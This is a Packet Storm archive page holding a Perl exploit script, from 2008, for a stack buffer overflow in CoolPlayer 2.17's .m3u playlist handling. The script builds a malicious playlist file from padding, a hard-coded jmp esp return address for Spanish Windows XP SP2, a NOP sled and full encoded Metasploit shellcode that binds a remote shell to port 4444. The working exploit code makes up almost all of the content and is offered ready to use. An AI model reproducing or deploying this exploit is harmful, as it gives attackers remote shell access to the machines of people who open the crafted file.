what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

coolplayer217-overflow.txt

coolplayer217-overflow.txt
Posted Jan 6, 2008
Authored by Trancek

CoolPlayer version 2.17 .m3u playlist stack overflow exploit that binds a shell to port 4444.

tags | exploit, overflow, shell
SHA-256 | cdff2e6770f455d03ba6e2c1262138e8142d7ae62186f141fcebc62cbbaf9f93

coolplayer217-overflow.txt

Change Mirror Download
#######################################################################
#
# CoolPlayer, Latest Build: 217
# Web:: http://coolplayer.sourceforge.net/
# Playlist(.m3u) File Local Buffer Overflow Exploit
#
# Vuln: http://www.securityfocus.com/bid/21396
#
#
# Greetz: Luigi Auriemma que ha descubierto una nueva vulnerabilidad en este software junto
# a esta vuln que era antigua y que ha sido redescubierta en un software con adware por mi
# TotalPlayer 3.0(fake de Coolplayer), thanks luigi xDD
# Además del equipo de www.p1mp4m.es -->musashi,patoruzu,elvispresley,pepepistola,skyline2412
#
# Y en especial a este ultimo:skyline2412(puso parte del codigo y me ayudo bastante con la tarea) y
# el_manguan que estuvo ayudando tambien y probando.
#
# Exploit by: Trancek
# Email:trancek@yashira.org
#
# Note: The .m3u file must be load in the player from the dir that was generated.
# and If the dir is the root directory as C:/ or F:/ , you must add AAA to junk
#
#######################################################################
use Cwd;

print "CoolPlayer 2.17 .m3u Exploit\n\n";


$dir = getcwd()."/";
$lon = length($dir);
$a = 260 - $lon;
$junk = 'A' x $a;
$ret = "\xED\x1E\x95\x7C"; #jmp esp en ntdll.dll,win xp sp2(spanish)


# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x22".
"\x5f\x3c\xf7\x83\xeb\xfc\xe2\xf4\xde\x35\xd7\xba\xca\xa6\xc3\x08".
"\xdd\x3f\xb7\x9b\x06\x7b\xb7\xb2\x1e\xd4\x40\xf2\x5a\x5e\xd3\x7c".
"\x6d\x47\xb7\xa8\x02\x5e\xd7\xbe\xa9\x6b\xb7\xf6\xcc\x6e\xfc\x6e".
"\x8e\xdb\xfc\x83\x25\x9e\xf6\xfa\x23\x9d\xd7\x03\x19\x0b\x18\xdf".
"\x57\xba\xb7\xa8\x06\x5e\xd7\x91\xa9\x53\x77\x7c\x7d\x43\x3d\x1c".
"\x21\x73\xb7\x7e\x4e\x7b\x20\x96\xe1\x6e\xe7\x93\xa9\x1c\x0c\x7c".
"\x62\x53\xb7\x87\x3e\xf2\xb7\xb7\x2a\x01\x54\x79\x6c\x51\xd0\xa7".
"\xdd\x89\x5a\xa4\x44\x37\x0f\xc5\x4a\x28\x4f\xc5\x7d\x0b\xc3\x27".
"\x4a\x94\xd1\x0b\x19\x0f\xc3\x21\x7d\xd6\xd9\x91\xa3\xb2\x34\xf5".
"\x77\x35\x3e\x08\xf2\x37\xe5\xfe\xd7\xf2\x6b\x08\xf4\x0c\x6f\xa4".
"\x71\x0c\x7f\xa4\x61\x0c\xc3\x27\x44\x37\x2d\xab\x44\x0c\xb5\x16".
"\xb7\x37\x98\xed\x52\x98\x6b\x08\xf4\x35\x2c\xa6\x77\xa0\xec\x9f".
"\x86\xf2\x12\x1e\x75\xa0\xea\xa4\x77\xa0\xec\x9f\xc7\x16\xba\xbe".
"\x75\xa0\xea\xa7\x76\x0b\x69\x08\xf2\xcc\x54\x10\x5b\x99\x45\xa0".
"\xdd\x89\x69\x08\xf2\x39\x56\x93\x44\x37\x5f\x9a\xab\xba\x56\xa7".
"\x7b\x76\xf0\x7e\xc5\x35\x78\x7e\xc0\x6e\xfc\x04\x88\xa1\x7e\xda".
"\xdc\x1d\x10\x64\xaf\x25\x04\x5c\x89\xf4\x54\x85\xdc\xec\x2a\x08".
"\x57\x1b\xc3\x21\x79\x08\x6e\xa6\x73\x0e\x56\xf6\x73\x0e\x69\xa6".
"\xdd\x8f\x54\x5a\xfb\x5a\xf2\xa4\xdd\x89\x56\x08\xdd\x68\xc3\x27".
"\xa9\x08\xc0\x74\xe6\x3b\xc3\x21\x70\xa0\xec\x9f\xcd\x91\xdc\x97".
"\x71\xa0\xea\x08\xf2\x5f\x3c\xf7";

$nopeando = "\x90" x 20;


open(m3u, ">./vulnerable.m3u");
print m3u "$junk";
print m3u "$ret";
print m3u "$nopeando";
print m3u "$shellcode";

# Post of exploit: http://www.p1mp4m.es/index.php?showtopic=58
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close